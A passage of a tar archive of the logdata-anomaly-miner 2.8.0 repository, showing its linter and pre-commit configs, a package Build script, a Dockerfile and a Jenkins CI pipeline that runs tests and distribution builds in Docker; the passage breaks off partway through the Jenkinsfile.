pax_global_header00006660000000000000000000000064150047630170014515gustar00rootroot0000000000000052 comment=b44fb9baa6a3c2bfef160edb4e2333c2f63d58c2 logdata-anomaly-miner-2.8.0/000077500000000000000000000000001500476301700157055ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/.bandit000066400000000000000000000002241500476301700171450ustar00rootroot00000000000000[bandit] exclude = aecid-testsuite/unit,.venv,/usr/lib/logdata-anomaly-miner/aecid-testsuite/unit,/usr/lib/logdata-anomaly-miner/.venv skips = B108 logdata-anomaly-miner-2.8.0/.flake8000066400000000000000000000005231500476301700170600ustar00rootroot00000000000000[flake8] exclude = aecid-testsuite/unit,aecid-testsuite/system,aecid-testsuite/integration,.venv,/usr/lib/logdata-anomaly-miner/aecid-testsuite/unit,/usr/lib/logdata-anomaly-miner/aecid-testsuite/system,/usr/lib/logdata-anomaly-miner/aecid-testsuite/integration,/usr/lib/logdata-anomaly-miner/.venv max-line-length = 140 statistics = True logdata-anomaly-miner-2.8.0/.github/000077500000000000000000000000001500476301700172455ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/.github/pull_request_template.md000066400000000000000000000012661500476301700242130ustar00rootroot00000000000000# Make sure these boxes are signed before submitting your Pull Request -- thank you. 
# Must haves - [ ] I have read and followed the contributing guidelines at https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Git-development-workflow - [ ] Issues exist for this PR - [ ] I added related issues using the "Fixes #"-notations - [ ] This Pull-Request merges into the "development"-branch Fixes # # Submission specific - [ ] This PR introduces breaking changes - [ ] My change requires a change to the documentation - [ ] I have updated the documentation accordingly - [ ] I have added tests to cover my changes - [ ] All new and existing tests passed # Describe changes: - logdata-anomaly-miner-2.8.0/.gitignore000066400000000000000000000043741500476301700177050ustar00rootroot00000000000000# Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # vim *.swp # C extensions *.so # Distribution / packaging .Python build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ parts/ sdist/ var/ wheels/ share/python-wheels/ *.egg-info/ .installed.cfg *.egg MANIFEST # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. 
*.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .nox/ .coverage .coverage.* .cache nosetests.xml coverage.xml *.cover *.py,cover .hypothesis/ .pytest_cache/ cover/ # Translations *.mo *.pot # Flask stuff: instance/ .webassets-cache # Scrapy stuff: .scrapy # Sphinx documentation _build docs/_build/ docs/Wiki docs/SECURITY.md docs/README.md docs/LICENSE.md #docker akafka/ aminercfg/ persistency/ logs/ # PyBuilder .pybuilder/ target/ # Jupyter Notebook .ipynb_checkpoints # IPython profile_default/ ipython_config.py # pyenv # For a library or package, you might want to ignore these files since the code is # intended to run in multiple environments; otherwise, check them in: # .python-version # pipenv # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. # However, in case of collaboration, if having platform-specific dependencies or dependencies # having no cross-platform support, pipenv may install dependencies that don't work, or not # install all needed dependencies. #Pipfile.lock # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow __pypackages__/ # Celery stuff celerybeat-schedule celerybeat.pid # SageMath parsed files *.sage.py # Environments .env .venv env/ venv/ ENV/ env.bak/ venv.bak/ # PyCharm IDE .idea/ # Spyder project settings .spyderproject .spyproject # Rope project settings .ropeproject # mkdocs documentation /site # mypy .mypy_cache/ .dmypy.json dmypy.json # Pyre type checker .pyre/ # pytype static type analyzer .pytype/ # Cython debug symbols cython_debug/ # ignore ansible-roles roles/ playbook.yml playbook.retry # for testing aecid-testsuite/aminer aecid-testsuite/demo/aminer/template_config.py # Aminer Docker Volumes aminercfg/ persistency/ logs/ logdata-anomaly-miner-2.8.0/.playbook.yml000066400000000000000000000003161500476301700203260ustar00rootroot00000000000000# aminer-ansible: https://github.com/ait-aecid/aminer-ansible.git - hosts: localhost vars: aminer_gitrepo: False # MODIFY THIS PATH aminer_repopath: "{{SOURCEDIR}}" roles: - aminer logdata-anomaly-miner-2.8.0/.pre-commit-config.yaml000066400000000000000000000040201500476301700221620ustar00rootroot00000000000000# See https://pre-commit.com for more information # See https://pre-commit.com/hooks.html for more hooks repos: - repo: https://github.com/pre-commit/pre-commit-hooks rev: v4.6.0 hooks: - id: trailing-whitespace exclude: aecid-testsuite/runAminerXmlInputDemo.sh - id: end-of-file-fixer - id: check-yaml exclude: aecid-testsuite/unit/data/configfiles/invalid_config.yml - id: check-added-large-files - id: check-ast - id: check-docstring-first - id: check-executables-have-shebangs - id: check-shebang-scripts-are-executable - id: check-symlinks - id: check-toml - id: check-xml - repo: https://github.com/pre-commit/pygrep-hooks rev: v1.10.0 hooks: - id: python-check-blanket-noqa - id: python-no-log-warn - repo: https://github.com/pre-commit/mirrors-mypy rev: v1.10.0 hooks: - id: mypy additional_dependencies: [pydantic, types-PyYAML] args: [--install-types, --ignore-missing-imports, 
--disable-error-code=attr-defined, --implicit-optional] exclude: aecid-testsuite|source/root/usr/lib/logdata-anomaly-miner/aminer/__init__.py - repo: https://github.com/PyCQA/flake8 rev: 7.0.0 hooks: - id: flake8 exclude: ^aecid-testsuite/unit/|^aecid-testsuite/system/|^aecid-testsuite/integration/|.venv/ args: [--statistics] - repo: https://github.com/PyCQA/docformatter rev: v1.7.5 hooks: - id: docformatter exclude: ^aecid-testsuite/unit/|^aecid-testsuite/system/|^aecid-testsuite/integration/|.venv/ - repo: https://github.com/PyCQA/bandit rev: 1.7.8 hooks: - id: bandit exclude: ^aecid-testsuite/ - repo: https://github.com/jendrikseipp/vulture rev: 'v2.11' hooks: - id: vulture - repo: https://github.com/pre-commit/mirrors-autopep8 rev: v2.0.4 hooks: - id: autopep8 args: [--max-line-length=140, --diff] exclude: ^aecid-testsuite/unit/|^aecid-testsuite/system/|^aecid-testsuite/integration/|.venv/ logdata-anomaly-miner-2.8.0/AUTHORS000066400000000000000000000004451500476301700167600ustar00rootroot00000000000000Roman Fiedler Markus Wurzenberger Max Landauer Wolfgang Hotwagner Ernst Leierzopf Georg Hoeld Florian Skopik Daniel Klimas logdata-anomaly-miner-2.8.0/Build000077500000000000000000000042421500476301700166740ustar00rootroot00000000000000#!/bin/bash -e # Build script wrapper # # How to use: # # * Build package only in temporary location _tmpRoot, # use it also for storing of temporary files (which should be # removed before creating the package). The directory is deleted # at the end of the script. By using it that way, no garbage files # are left over after building and symlink attacks on temporary # directories are prevented. # # The script will place the new packages in the current working # directory, overwriting any existing files of same name. if [ "${EUID} ${UID}" = "0 0" ] && touch /fake-root-detect 2> /dev/null; then rm /fake-root-detect echo "Build should not be run as root!" 
>&2 exit 1 fi # Export tmp dir to allow large package builds within vservers export TMPDIR="/var/tmp" _projectDir="$(pwd)" # Use a temporary directory for building, no need to keep it. _tmpRoot="$(mktemp -d)" echo "Building package at ${_tmpRoot}" >&2 _debDirectory="${_tmpRoot}/deb-build" _tarVersion=$(head -1 debian/changelog | awk 'match($0, /\(.*\)/) { print substr($0, RSTART+1, RLENGTH-4) } ') mkdir -- "${_debDirectory}" cp -a -- "${_projectDir}/debian" "${_projectDir}/source/root" "${_debDirectory}" cp -a -- "${_projectDir}/README.md" "${_debDirectory}" fakeroot -- tar -C ${_debDirectory} -czf "${_tmpRoot}/logdata-anomaly-miner_${_tarVersion}.orig.tar.gz" --transform 's,^./,deb-build/,' . gpg -ab "${_tmpRoot}/logdata-anomaly-miner_${_tarVersion}.orig.tar.gz" # Build packages: # -F: full build # -us: unsigned sorce # -uc: unsigned changes # -sa: force inclusion of original source (set -e; cd -- "${_debDirectory}"; dpkg-buildpackage -S -us -uc -sa; dpkg-buildpackage -b -uc) rm -rf -- "${_debDirectory}" cp -a -- "${_tmpRoot}/logdata-anomaly-miner_"* . rm -rf -- "${_tmpRoot}" # Build the alienated package for CentOS/Redhat. _debFileName="$(ls -- logdata-anomaly-miner_*_all.deb)" _debVersion="$(echo "${_debFileName}" | sed -r -e 's/logdata-anomaly-miner_([0-9a-z.~-]+)_all.deb/\1/')" fakeroot -- /usr/bin/alien --to-rpm "${_debFileName}" mv -i -- "logdata-anomaly-miner-${_debVersion}-2.noarch.rpm" "logdata-anomaly-miner-${_debVersion}-2.noarch.alien.rpm" < /dev/null echo "Build successful" >&2 logdata-anomaly-miner-2.8.0/Dockerfile000066400000000000000000000060001500476301700176730ustar00rootroot00000000000000# logdata-anomaly-miner Dockerfile # # Use build-script to create docker: # scripts/build_docker.sh # # Build manually: # docker build -t aecid/logdata-anomaly-miner:latest -t aecid/logdata-anomaly-miner:$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') . 
# # See: https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Deployment-with-Docker # # Pull base image. FROM debian:bookworm ARG UNAME=aminer ARG UID=1000 ARG GID=1000 ARG varbranch="main" ENV BRANCH=$varbranch # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y --no-install-recommends apt-utils RUN apt-get update && apt-get install -y \ supervisor \ python3 \ python3-pip \ libacl1-dev \ sudo \ rsyslog # Docs RUN apt-get update && apt-get install -y \ python3-sphinx \ python3-sphinx-rtd-theme \ python3-recommonmark \ make ADD . /home/aminer/logdata-anomaly-miner RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b $BRANCH -s /home/aminer/logdata-anomaly-miner # For Docs ADD docs /docs ADD README.md /docs ADD SECURITY.md /docs ADD LICENSE /docs/LICENSE.md # Copy logdata-anomaly-miner-sources ADD source/root/usr/lib/logdata-anomaly-miner /usr/lib/logdata-anomaly-miner # copy these files instead as symlinks would need absolute paths. 
ADD source/root/etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds2/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/generic/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds /etc/aminer/conf-available/ait-lds ADD source/root/etc/aminer/conf-available/ait-lds2 /etc/aminer/conf-available/ait-lds2 ADD source/root/etc/aminer/conf-available/generic /etc/aminer/conf-available/generic # Entrypoint-wrapper ADD scripts/aminerwrapper.sh /aminerwrapper.sh # Prepare the system and link all python-modules RUN chmod 0755 /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py \ && chmod 0755 /etc/aminer \ && mkdir -p /var/lib/aminer/logs \ && chown $UID.$GID -R /var/lib/aminer \ && chown $UID.$GID -R /docs \ && chmod 0755 /aminerwrapper.sh RUN PACK=$(find /usr/lib/python3/dist-packages -name posix1e.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE # Prepare Supervisord COPY scripts/supervisord.conf /etc/supervisor/conf.d/supervisord.conf RUN mkdir /var/lib/supervisor && chown $UID.$GID -R /var/lib/supervisor \ && chown $UID.$GID -R /var/log/supervisor/ USER aminer WORKDIR /home/aminer # The following volumes can be mounted VOLUME ["/etc/aminer","/var/lib/aminer","/logs"] ENTRYPOINT ["/aminerwrapper.sh"] # Default command for the ENTRYPOINT(wrapper) CMD ["aminer","--config","/etc/aminer/config.yml"] logdata-anomaly-miner-2.8.0/Jenkinsfile000066400000000000000000000770741500476301700201100ustar00rootroot00000000000000void setBuildStatus(String message, String state) { step([ $class: "GitHubCommitStatusSetter", reposSource: [$class: "ManuallyEnteredRepositorySource", url: "https://github.com/ait-aecid/logdata-anomaly-miner"], contextSource: [$class: "ManuallyEnteredCommitContextSource", context: "ci/jenkins/build-status"], errorHandlers: [[$class: "ChangingBuildStatusErrorHandler", result: "UNSTABLE"]], 
statusResultSource: [ $class: "ConditionalStatusResultSource", results: [[$class: "AnyBuildResult", message: message, state: state]] ] ]); } def ubuntu20image = false def ubuntu22image = false def ubuntu24image = false def debianbusterimage = false def debianbullseyeimage = false def debianbookwormimage = false def productionimage = false def docsimage = false def fedoraimage = false def redhatimage = false pipeline { agent any stages { stage("Build Test-Container") { steps { sh "docker build -f aecid-testsuite/Dockerfile -t aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." } } stage("Testing") { parallel { stage("Declarative: Static Analysis & Basic Functionality") { steps { sh "echo \"Running static analysis & basic functionality tests.\"" } } stage("Mypy"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runMypy" } } stage("Bandit"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runBandit" } } stage("Vulture"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runVulture" } } stage("Flake8"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runFlake8" } } stage("Mccabe"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runMccabe" } } stage("Release String Check"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runReleaseStringCheck" } } stage("Suspend Mode"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runSuspendModeTest" } } stage("Remote Control"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runRemoteControlTest" } } 
stage("Integration Test 1"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerIntegrationTest aminerIntegrationTest.sh config.py" } } stage("Integration Test 2"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerIntegrationTest aminerIntegrationTest2.sh config21.py config22.py" } } stage("Offline Mode"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runOfflineMode" } } stage("Unittests") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runUnittests" } } stage("Declarative: Aminer Demo Tests") { steps { sh "echo \"Running AMiner demo tests.\"" } } stage("demo-config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/demo-config.py" } } stage("demo-config.yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/demo-config.yml" } } stage("jsonConverterHandler-demo-config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/jsonConverterHandler-demo-config.py" } } stage("template_config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/template_config.py" } } stage("template_config.yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/template_config.yml" } } stage("Encoding Demo .py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerEncodingDemo 
demo/aminer/demo-config.py" } } stage("Encoding Demo .yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerEncodingDemo demo/aminer/demo-config.yml" } } stage("Declarative: JSON/XML Input Tests") { steps { sh "echo \"Running JSON/XML input tests.\"" } } stage("JSON Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerJsonInputDemo" } } stage("XML Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerXmlInputDemo" } } stage("AMiner Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-aminer-demo.yml" } } stage("Elastic Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-elastic-demo.yml" } } stage("Eve Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-eve-demo.yml" } } stage("Journal Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-journal-demo.yml" } } stage("Wazuh Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-wazuh-demo.yml" } } stage("Windows Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/windows.yml" } } stage("Declarative: System, Documentation and Wiki Tests") { steps { sh "echo \"Running system, documentation and wiki 
tests.\"" } } stage("Available Configs") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runConfAvailableTest" } } stage("Debian Bookworm Docker") { steps { script { debianbookwormimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-bookworm:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:bookworm ." sh "mkdir -p /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-debian-bookworm:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Debian Bullseye Docker") { steps { script { debianbullseyeimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:bullseye ." 
sh "mkdir -p /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Debian Buster Docker") { steps { script { debianbusterimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:buster ." 
sh "mkdir -p /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Production Docker Image") { steps { script { productionimage = true } sh "docker build -f Dockerfile -t aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development ." 
sh "mkdir -p /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Ubuntu 24.04 Docker") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script { ubuntu24image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-2404:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:24.04 ." 
sh "mkdir -p /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-ubuntu-2404:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Ubuntu 22.04 Docker") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script { ubuntu22image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-2204:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:22.04 ." 
sh "mkdir -p /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-ubuntu-2204:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Ubuntu 20.04 Docker") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script { ubuntu20image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t 